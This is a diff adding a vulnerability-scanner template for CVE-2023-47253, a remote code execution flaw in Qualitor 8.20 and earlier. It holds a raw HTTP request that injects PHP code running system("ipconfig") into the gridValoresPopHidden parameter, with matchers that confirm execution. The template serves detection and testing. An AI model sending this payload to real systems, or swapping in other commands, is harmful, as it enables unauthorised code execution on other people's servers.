diff --git a/http/cves/2023/CVE-2023-47253.yaml b/http/cves/2023/CVE-2023-47253.yaml new file mode 100644 index 0000000000..c8fd8e1993 --- /dev/null +++ b/http/cves/2023/CVE-2023-47253.yaml @@ -0,0 +1,41 @@ +id: CVE-2023-47253 + +info: + name: Qualitor <= 8.20 - Remote Code Execution + author: s4e-io + severity: critical + description: | + Qualitor through 8.20 allows remote attackers to execute arbitrary code via PHP code in the html/ad/adpesquisasql/request/processVariavel.php gridValoresPopHidden parameter. + reference: + - https://github.com/vnxdtzip/CVE-2023-47253 + - https://nvd.nist.gov/vuln/detail/CVE-2023-47253 + - https://openxp.xpsecsecurity.io/blog/cve-2023-47253 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-47253 + cwe-id: CWE-77 + epss-score: 0.00615 + epss-percentile: 0.78986 + cpe: cpe:2.3:a:qualitor:qalitor:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: qualitor + product: qualitor + fofa-query: "Qualitor" + tags: cve,cve2023,rce,qualitor + +http: + - raw: + - | + GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system("ipconfig"); HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"Windows","DNS")' + - 'contains(content_type,"text/javascript")' + - 'status_code == 200' + condition: and